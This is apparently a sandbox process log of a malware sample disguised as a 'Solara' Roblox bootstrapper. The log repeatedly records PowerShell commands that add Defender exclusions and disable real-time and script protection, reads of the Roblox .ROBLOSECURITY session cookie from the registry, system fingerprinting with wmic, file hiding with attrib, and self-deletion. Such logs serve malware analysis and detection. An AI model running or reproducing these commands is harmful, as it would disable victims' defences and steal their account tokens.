C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
